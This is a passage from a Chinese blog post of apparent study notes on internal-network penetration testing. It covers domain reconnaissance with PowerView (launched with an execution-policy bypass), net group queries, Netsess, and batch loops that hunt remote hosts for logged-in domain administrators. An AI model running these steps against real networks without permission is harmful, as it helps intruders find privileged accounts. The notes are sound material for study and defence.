 smb-enum-processes.nse:对主机的系统进程进行遍历。通过这些信息，可以知道目标主机
上运行软件信息，选择合适的漏洞或者规避防火墙及杀毒软件。
 smb-enum-sessions.nse:获取域内主机的用户登录会话，查看当前是否有用户登录。
 smb-os-discovery.nse:收集目标主机的操作系统、计算机名、域名、全称域名、域林名称、
NetBIOS 机器名、NetBIOS 域名、工作组、系统时间。</code></pre><h5 id="PowerView脚本"><a href="#PowerView脚本" class="headerlink" title="PowerView脚本"></a>PowerView脚本</h5><p>下载地址为 <a href="https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView" target="_blank" rel="noopener">https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView</a></p>
<h6 id="Invoke-UserHunter-找到域内特定的用户群"><a href="#Invoke-UserHunter-找到域内特定的用户群" class="headerlink" title="Invoke-UserHunter 找到域内特定的用户群"></a>Invoke-UserHunter 找到域内特定的用户群</h6><p>使用这个工具是不需要管理员权限的。在本地绕过执行该脚本</p>
<pre><code>powershell.exe -exec bypass -Command &quot;&amp; {Import-Module C:\PowerView.ps1; Invoke-UserHunter}&quot;</code></pre><p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772523806482.jpg" alt="-w654"></p>
<h3 id="查找域管理进程"><a href="#查找域管理进程" class="headerlink" title="查找域管理进程"></a>查找域管理进程</h3><h4 id="本机检查"><a href="#本机检查" class="headerlink" title="本机检查"></a>本机检查</h4><h5 id="获取域管理员列表-net-group-“Domain-Admins”-domain"><a href="#获取域管理员列表-net-group-“Domain-Admins”-domain" class="headerlink" title="获取域管理员列表 net group “Domain Admins” /domain"></a>获取域管理员列表 net group “Domain Admins” /domain</h5><p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772531878693.jpg" alt="-w443"></p>
<h5 id="列出本机所有进程及进程用户-Tasklist-v"><a href="#列出本机所有进程及进程用户-Tasklist-v" class="headerlink" title="列出本机所有进程及进程用户 Tasklist /v"></a>列出本机所有进程及进程用户 Tasklist /v</h5><h6 id="寻找是否有进程所有者为域管理员的进程"><a href="#寻找是否有进程所有者为域管理员的进程" class="headerlink" title="寻找是否有进程所有者为域管理员的进程"></a>寻找是否有进程所有者为域管理员的进程</h6><p>当前存在域管理进程。通过对本机检查的方法，如果能够顺便找到域管理员进程是最好的， 但有时实际情况并非这样。<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772533404901.jpg" alt="-w835"></p>
<h4 id="查询域控制器的域用户会话"><a href="#查询域控制器的域用户会话" class="headerlink" title="查询域控制器的域用户会话"></a>查询域控制器的域用户会话</h4><h5 id="查询域控制器列表-net-group-“Domain-Controllers”-domain"><a href="#查询域控制器列表-net-group-“Domain-Controllers”-domain" class="headerlink" title="查询域控制器列表 net group “Domain Controllers” /domain"></a>查询域控制器列表 net group “Domain Controllers” /domain</h5><p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772536978961.jpg" alt="-w534"></p>
<h5 id="收集域管理员列表-net-group-“Domain-Admins”-domain"><a href="#收集域管理员列表-net-group-“Domain-Admins”-domain" class="headerlink" title="收集域管理员列表 net group “Domain Admins” /domain"></a>收集域管理员列表 net group “Domain Admins” /domain</h5><p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772537425820.jpg" alt="-w512"></p>
<h5 id="收集所有活动域会话列表-Netsess-exe-–h"><a href="#收集所有活动域会话列表-Netsess-exe-–h" class="headerlink" title="收集所有活动域会话列表 Netsess.exe –h"></a>收集所有活动域会话列表 Netsess.exe –h</h5><p>该函数可以返回活动会 话的 IP 地址、域账户、会话开始时间和空闲时间:<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772538457120.jpg" alt="-w650"></p>
<h4 id="扫描远程系统上运行的任务"><a href="#扫描远程系统上运行的任务" class="headerlink" title="扫描远程系统上运行的任务"></a>扫描远程系统上运行的任务</h4><p>1、同样首先从“域管理员”组中收集域管理员的列表。net group “Domain Admins” /domain<br>2、然后使用下列脚本，其中 ips.txt 填入目标域系统的列表，在 names.txt 填入收集来的域管理员 的列表。运行结果如图所示：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">FOR &#x2F;F %i in (ips.txt) DO @echo [+] %i &amp;&amp; @tasklist &#x2F;V &#x2F;S %i &#x2F;U user &#x2F;P password 2&gt;NUL &gt; output.txt &amp;&amp; FOR &#x2F;F %n in (names.txt) DO @type output.txt | findstr %n &gt; NUL &amp;&amp; echo [!] %n was found running a process on %i &amp;&amp; pause</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772542285078.jpg" alt="-w719"></p>
<h4 id="扫描远程系统上-NetBIOS-信息"><a href="#扫描远程系统上-NetBIOS-信息" class="headerlink" title="扫描远程系统上 NetBIOS 信息"></a>扫描远程系统上 NetBIOS 信息</h4><p>先收集域管理员列表，然后将目标域系统列表添加到 ips.txt 文件中，将收集到的域管理员列表添加到 admins.txt 文件中，并置于同一目录下，如图所示。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for &#x2F;F %i in (ips.txt) do @echo [+] Checking %i &amp;&amp; nbtstat -A %i 2&gt;NUL &gt;nbsessions.txt &amp;&amp; FOR &#x2F;F %n in (admins.txt) DO @type nbsessions.txt | findstr &#x2F;I %n &gt; NUL &amp;&amp; echo [!] %n was found logged into %i</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772572597188.jpg" alt="-w719"></p>
<p>同样，在这里也可以使用 nbtscan 工具。先收集域管理员列表，然后将目标域系统列表添加到 ips.txt 文件中，将收集到的域管理员列表添加到 admins.txt 文件中，和 nbtscan 工具置于同一目录 下，如图:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for &#x2F;F %i in (ips.txt) do @echo [+] Checking %i &amp;&amp; nbtscan -f %i 2&gt;NUL &gt;nbsessions.txt &amp;&amp; FOR &#x2F;F %n in (admins.txt) DO @type nbsessions.txt | findstr &#x2F;I %n &gt; NUL &amp;&amp; echo [!] %n was found logged into %i</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772573099930.jpg" alt="-w715"></p>
<h3 id="利用-PowerShell收集域信息"><a href="#利用-PowerShell收集域信息" class="headerlink" title="利用 PowerShell收集域信息"></a>利用 PowerShell收集域信息</h3><p>如果想执行一个 PowerShell 脚本，需要修改 PowerShell 的默认权限为执行权限。PowerShell 常用的执行权限共有四种，具体如下:</p>
<pre><code>Restricted:默认设置，不允许执行任何脚本。
Allsigned:只能运行经过证书验证的脚本。
Unrestricted:权限最高，可以执行任意脚本。
RemoteSigned:本地脚本无限制，但是对来自网络的脚本必须经过签名</code></pre><p>在 PowerShell 中输入“Get-ExecutionPolicy”，看到为默认 Restricted 权限，如图：<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772576241516.jpg" alt="-w551"><br>将 PowerShell 执行权限改为 Unrestricted，输入“Y”，如图：<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772576418913.jpg" alt="-w911"><br>PowerView 是一款依赖 PowerShell 和 WMI 对内网域情况进行查询的常用渗透脚本。<br>PowerView 集成在 PowerSploit 工具包中，下载地址为 <a href="https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1。" target="_blank" rel="noopener">https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1。</a><br>打开一个 PowerShell 窗口，进入 PowerSploit 目录下的 Recon 目录，输入命令“Import- Module .\PowerView.ps1”，成功导入脚本，没有报错，如图所示<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772580310274.jpg" alt="-w764"><br>PowerView 中的常用命令如下。</p>
<pre><code>Get-NetDomain:获取当前用户所在的域名称。
Get-NetUser:返回所有用户的详细信息。
Get-NetDomainController:获取所有域控制器。
Get-NetComputer:获取所有域内机器的详细信息。
Get-NetOU:获取域中的 OU 信息。
Get-NetGroup:获取所有域内组和组成员信息。
Get-NetFileServer:根据 SPN 获取当前域使用的文件服务器。
Get-NetShare:获取当前域内所有网络共享。
Get-NetSession:获取在指定服务器存在的会话信息。
Get-NetRDPSession:获取在指定服务器存在的远程连接信息。
Get-NetProcess:获取远程主机的进程信息。
Get-UserEvent:获取指定用户的日志信息。
Get-ADObject:获取活动目录的对象信息。
Get-NetGPO:获取域所有组策略对象。
Get-DomainPolicy:获取域默认或域控制器策略。
Invoke-UserHunter:用于获取域用户登录计算机及该用户是否有本地管理权限。 
Invoke-ProcessHunter:查找域内所有机器进程用于找到某特定用户。
Invoke-UserEventHunter:根据用户日志获取某域用户登录过哪些域机器。</code></pre>
    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item"></div>
      <div class="post-nav-item">
    <a href="/2020/02/23/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/hello-world/" rel="next" title="Hello World">
      Hello World <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#内网渗透-——（1）信息搜集"><span class="nav-number">1.</span> <span class="nav-text">内网渗透 ——（1）信息搜集</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#WMIC脚本自动收集"><span class="nav-number">1.1.</span> <span class="nav-text">WMIC脚本自动收集</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#本机信息收集"><span class="nav-number">1.2.</span> <span class="nav-text">本机信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#获取操作系统和版本信息"><span class="nav-number">1.2.1.</span> <span class="nav-text">获取操作系统和版本信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看安装软件以及版本，路径等"><span class="nav-number">1.2.2.</span> <span class="nav-text">查看安装软件以及版本，路径等</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查询本机服务信息"><span class="nav-number">1.2.3.</span> <span class="nav-text">查询本机服务信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查询进程列表"><span class="nav-number">1.2.4.</span> <span class="nav-text">查询进程列表</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看启动程序信息"><span class="nav-number">1.2.5.</span> <span class="nav-text">查看启动程序信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看计划任务"><span class="nav-number">1.2.6.</span> <span class="nav-text">查看计划任务</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看主机开机时间"><span class="nav-number">1.2.7.</span> <span class="nav-text">查看主机开机时间</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查询用户列表"><span class="nav-number">1.2.8.</span> <span class="nav-text">查询用户列表</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#获取本地管理员（通常含有域用户）信息"><span class="nav-number">1.2.9.</span> <span class="nav-text">获取本地管理员（通常含有域用户）信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看当前在线用户"><span class="nav-number">1.2.10.</span> <span class="nav-text">查看当前在线用户</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#列出或断开本地计算机和连接的客户端的会话"><span class="nav-number">1.2.11.</span> <span class="nav-text">列出或断开本地计算机和连接的客户端的会话</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看端口列表"><span class="nav-number">1.2.12.</span> <span class="nav-text">查看端口列表</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查询补丁列表"><span class="nav-number">1.2.13.</span> <span class="nav-text">查询补丁列表</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查询本机共享"><span class="nav-number">1.2.14.</span> <span class="nav-text">查询本机共享</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查询路由表及所有可用接口的-ARP-缓存表"><span class="nav-number">1.2.15.</span> <span class="nav-text">查询路由表及所有可用接口的 ARP 缓存表</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查询防火墙配置"><span class="nav-number">1.2.16.</span> <span class="nav-text">查询防火墙配置</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#关闭防火墙配置"><span class="nav-number">1.2.17.</span> <span class="nav-text">关闭防火墙配置</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#修改防火墙配置（允许指定程序全部连接）"><span class="nav-number">1.2.18.</span> <span class="nav-text">修改防火墙配置（允许指定程序全部连接）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#不关闭防火墙，允许指定程序连接或者3389放行"><span class="nav-number">1.2.19.</span> <span class="nav-text">不关闭防火墙，允许指定程序连接或者3389放行</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查询计算机代理配置情况"><span class="nav-number">1.2.20.</span> <span class="nav-text">查询计算机代理配置情况</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看远程连接的端口"><span class="nav-number">1.2.21.</span> <span class="nav-text">查看远程连接的端口</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查询并开启远程连接服务-依次图片三条命令"><span class="nav-number">1.2.22.</span> <span class="nav-text">查询并开启远程连接服务(依次图片三条命令)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断是否为域用户"><span class="nav-number">1.2.23.</span> <span class="nav-text">判断是否为域用户</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看该域内的主机（需本地管理员权限）"><span class="nav-number">1.2.24.</span> <span class="nav-text">查看该域内的主机（需本地管理员权限）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#获取域SID"><span class="nav-number">1.2.25.</span> <span class="nav-text">获取域SID</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查询指定账户的详细信息"><span class="nav-number">1.2.26.</span> <span class="nav-text">查询指定账户的详细信息</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#域内信息收集"><span class="nav-number">1.3.</span> <span class="nav-text">域内信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#判断是否有域"><span class="nav-number">1.3.1.</span> <span class="nav-text">判断是否有域</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#ipconfig-all"><span class="nav-number">1.3.1.1.</span> <span class="nav-text">ipconfig &#x2F;all</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#systeminfo"><span class="nav-number">1.3.1.2.</span> <span class="nav-text">systeminfo</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#net-config-workstation"><span class="nav-number">1.3.1.3.</span> <span class="nav-text">net config workstation</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#net-time-domain-判断主域"><span class="nav-number">1.3.1.4.</span> <span class="nav-text">net time &#x2F;domain (判断主域)</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#域内存活主机探测"><span class="nav-number">1.3.2.</span> <span class="nav-text">域内存活主机探测</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#利用nbtscan探测内网"><span class="nav-number">1.3.2.1.</span> <span class="nav-text">利用nbtscan探测内网</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用icmp协议快速探测内网"><span class="nav-number">1.3.2.2.</span> <span class="nav-text">利用icmp协议快速探测内网</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#通过-ARP-扫描探测内网"><span class="nav-number">1.3.2.3.</span> <span class="nav-text">通过 ARP 扫描探测内网</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#arp-scan工具"><span class="nav-number">1.3.2.3.1.</span> <span class="nav-text">arp-scan工具</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Empire中的arpsan模块"><span class="nav-number">1.3.2.3.2.</span> <span class="nav-text">Empire中的arpsan模块</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Nishang中的Invoke-ARPScan-ps1脚本"><span class="nav-number">1.3.2.3.3.</span> <span class="nav-text">Nishang中的Invoke-ARPScan.ps1脚本</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#通过常规-TCP-UDP-端口扫描探测内网"><span class="nav-number">1.3.2.4.</span> <span class="nav-text">通过常规 TCP&#x2F;UDP 端口扫描探测内网</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#扫描域内端口"><span class="nav-number">1.3.2.5.</span> <span class="nav-text">扫描域内端口</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#利用-Telnet-命令进行扫描"><span class="nav-number">1.3.2.5.1.</span> <span class="nav-text">利用 Telnet 命令进行扫描</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#S扫描器"><span class="nav-number">1.3.2.5.2.</span> <span class="nav-text">S扫描器</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Metasploit端口扫描"><span class="nav-number">1.3.2.5.3.</span> <span class="nav-text">Metasploit端口扫描</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#PowerSploit下的Invoke-portscan-ps1模块-无需下载"><span class="nav-number">1.3.2.5.4.</span> <span class="nav-text">PowerSploit下的Invoke-portscan.ps1模块(无需下载)</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Nishang-下的-Invoke-PortScan-模块"><span class="nav-number">1.3.2.5.5.</span> <span class="nav-text">Nishang 下的 Invoke-PortScan 模块</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#端口Banner信息"><span class="nav-number">1.3.2.5.6.</span> <span class="nav-text">端口Banner信息</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#常见的端口及其说明（端口爆破及利用）"><span class="nav-number">1.3.2.6.</span> <span class="nav-text">常见的端口及其说明（端口爆破及利用）</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#收集域内基础信息"><span class="nav-number">1.3.3.</span> <span class="nav-text">收集域内基础信息</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#查询域-net-view-domain"><span class="nav-number">1.3.3.1.</span> <span class="nav-text">查询域 net view &#x2F;domain</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查询此域内所有计算机-net-view-domain-XXX"><span class="nav-number">1.3.3.2.</span> <span class="nav-text">查询此域内所有计算机 net view &#x2F;domain:XXX</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查询域内所有用户组列表-net-group-domain"><span class="nav-number">1.3.3.3.</span> <span class="nav-text">查询域内所有用户组列表 net group &#x2F;domain</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查询所有域成员计算机列表-net-group-“domain-computers”-domain"><span class="nav-number">1.3.3.4.</span> <span class="nav-text">查询所有域成员计算机列表 net group “domain computers” &#x2F;domain</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#获取域密码信息-net-accounts-domain"><span class="nav-number">1.3.3.5.</span> <span class="nav-text">获取域密码信息 net accounts &#x2F;domain</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#获取域信任信息-nltest-domain-trusts"><span class="nav-number">1.3.3.6.</span> <span class="nav-text">获取域信任信息 nltest &#x2F;domain_trusts</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查找域控制器"><span class="nav-number">1.3.4.</span> <span class="nav-text">查找域控制器</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#查看域内控制器的机器名-nltest-DCLIST-XXX"><span class="nav-number">1.3.4.1.</span> <span class="nav-text">查看域内控制器的机器名 nltest &#x2F;DCLIST:XXX</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查看域内控制器的主机名-Nslookup-type-SRV-ldap-tcp"><span class="nav-number">1.3.4.2.</span> <span class="nav-text">查看域内控制器的主机名 Nslookup -type&#x3D;SRV _ldap._tcp</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查看当前时间-net-time-domain"><span class="nav-number">1.3.4.3.</span> <span class="nav-text">查看当前时间 net time &#x2F;domain</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查看域控制器组-net-group-“Domain-Controllers”-domain"><span class="nav-number">1.3.4.4.</span> <span class="nav-text">查看域控制器组 net group “Domain Controllers” &#x2F;domain</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#获取域内的用户和管理员信息"><span class="nav-number">1.3.5.</span> <span class="nav-text">获取域内的用户和管理员信息</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#查询所有域用户列表"><span class="nav-number">1.3.5.1.</span> <span class="nav-text">查询所有域用户列表</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#向域控制器进行查询-net-user-domain"><span class="nav-number">1.3.5.1.1.</span> <span class="nav-text">向域控制器进行查询 net user &#x2F;domain</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#获取域内用户详细信息-wmic-useraccount-get-all"><span class="nav-number">1.3.5.1.2.</span> <span class="nav-text">获取域内用户详细信息 wmic useraccount get &#x2F;all</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#查看存在的用户-dsquery-user"><span class="nav-number">1.3.5.1.3.</span> <span class="nav-text">查看存在的用户 dsquery user</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#查询域内置本地管理员组用户-net-localgroup-administrators-domain"><span class="nav-number">1.3.5.1.4.</span> <span class="nav-text">查询域内置本地管理员组用户 net localgroup administrators &#x2F;domain</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查询域管理员用户组"><span class="nav-number">1.3.5.2.</span> <span class="nav-text">查询域管理员用户组</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#查询域管理员用户-net-group-“domain-admins”-domain"><span class="nav-number">1.3.5.2.1.</span> <span class="nav-text">查询域管理员用户 net group “domain admins” &#x2F;domain</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#查询管理员用户组-net-group-“Enterprise-Admins”-domain"><span class="nav-number">1.3.5.2.2.</span> <span class="nav-text">查询管理员用户组 net group “Enterprise Admins” &#x2F;domain</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#定位域管理员"><span class="nav-number">1.3.6.</span> <span class="nav-text">定位域管理员</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#常用域管理员定位工具"><span class="nav-number">1.3.6.1.</span> <span class="nav-text">常用域管理员定位工具</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#psloggedon-exe-显示本地登录的用户和通过本地计算机或远程计算机的资源登录的用户"><span class="nav-number">1.3.6.1.1.</span> <span class="nav-text">psloggedon.exe 显示本地登录的用户和通过本地计算机或远程计算机的资源登录的用户</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#pveFindADUser-exe-curren-即可显示域中的所有计算机-计算机、服务器、域控制器等-上当前登录的所有用户"><span class="nav-number">1.3.6.1.2.</span> <span class="nav-text">pveFindADUser.exe  -curren 即可显示域中的所有计算机 (计算机、服务器、域控制器等)上当前登录的所有用户</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#netview-exe-lt-参数-gt-枚举登录的用户"><span class="nav-number">1.3.6.1.3.</span> <span class="nav-text">netview.exe &lt;参数&gt;  枚举登录的用户</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Nmap-的-NSE-脚本"><span class="nav-number">1.3.6.1.4.</span> <span class="nav-text">Nmap 的 NSE 脚本</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#PowerView脚本"><span class="nav-number">1.3.6.1.5.</span> <span class="nav-text">PowerView脚本</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#Invoke-UserHunter-找到域内特定的用户群"><span class="nav-number">1.3.6.1.5.1.</span> <span class="nav-text">Invoke-UserHunter 找到域内特定的用户群</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查找域管理进程"><span class="nav-number">1.3.7.</span> <span class="nav-text">查找域管理进程</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#本机检查"><span class="nav-number">1.3.7.1.</span> <span class="nav-text">本机检查</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#获取域管理员列表-net-group-“Domain-Admins”-domain"><span class="nav-number">1.3.7.1.1.</span> <span class="nav-text">获取域管理员列表 net group “Domain Admins” &#x2F;domain</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#列出本机所有进程及进程用户-Tasklist-v"><span class="nav-number">1.3.7.1.2.</span> <span class="nav-text">列出本机所有进程及进程用户 Tasklist &#x2F;v</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#寻找是否有进程所有者为域管理员的进程"><span class="nav-number">1.3.7.1.2.1.</span> <span class="nav-text">寻找是否有进程所有者为域管理员的进程</span></a></li></ol></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#查询域控制器的域用户会话"><span class="nav-number">1.3.7.2.</span> <span class="nav-text">查询域控制器的域用户会话</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#查询域控制器列表-net-group-“Domain-Controllers”-domain"><span class="nav-number">1.3.7.2.1.</span> <span class="nav-text">查询域控制器列表 net group “Domain Controllers” &#x2F;domain</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#收集域管理员列表-net-group-“Domain-Admins”-domain"><span class="nav-number">1.3.7.2.2.</span> <span class="nav-text">收集域管理员列表 net group “Domain Admins” &#x2F;domain</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#收集所有活动域会话列表-Netsess-exe-–h"><span class="nav-number">1.3.7.2.3.</span> <span class="nav-text">收集所有活动域会话列表 Netsess.exe –h</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#扫描远程系统上运行的任务"><span class="nav-number">1.3.7.3.</span> <span class="nav-text">扫描远程系统上运行的任务</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#扫描远程系统上-NetBIOS-信息"><span class="nav-number">1.3.7.4.</span> <span class="nav-text">扫描远程系统上 NetBIOS 信息</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用-PowerShell收集域信息"><span class="nav-number">1.3.8.</span> <span class="nav-text">利用 PowerShell收集域信息</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">tale</p>
  <div class="site-description" itemprop="description">tales</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">2</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">tale</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> v4.2.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">Theme – <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.7.1
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
